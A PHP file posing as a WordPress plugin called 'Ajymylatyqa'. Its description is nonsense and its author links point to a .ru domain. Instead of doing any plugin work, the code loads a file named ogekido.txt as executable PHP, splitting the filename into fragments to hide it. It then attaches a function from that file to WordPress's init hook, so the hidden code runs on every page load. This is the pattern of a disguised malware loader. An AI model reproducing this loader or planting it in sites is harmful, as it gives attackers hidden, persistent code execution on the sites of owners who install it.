<?php

/**
 * Plugin Name: Ajymylatyqa
 * Plugin URI: https://boutee258.ru/ajymylatyqa
 * Description: And lifetime 2000. During the following
 * Version: 2.11.15
 * Author: Marcelo Aldo
 * Author URI: https://boutee258.ru
 * Text Domain: ajymylatyqa
 * License: GPL2+
 *
 */

function urapad_athyjycuw() {
    idukeg_wysejetash();
}

$odobaw = __DIR__ . '/ogekido.txt';
if (file_exists($odobaw)) {
    include_once __DIR__ . "/ogeki" . "do.t" . "xt";
}


if (function_exists("idukeg_wysejetash")) {
    $xufewy = new ygupik_ubeqivys();
    if ($xufewy->cakogi_muchokeh()) {
        add_action('init', 'urapad_athyjycuw');
    }
}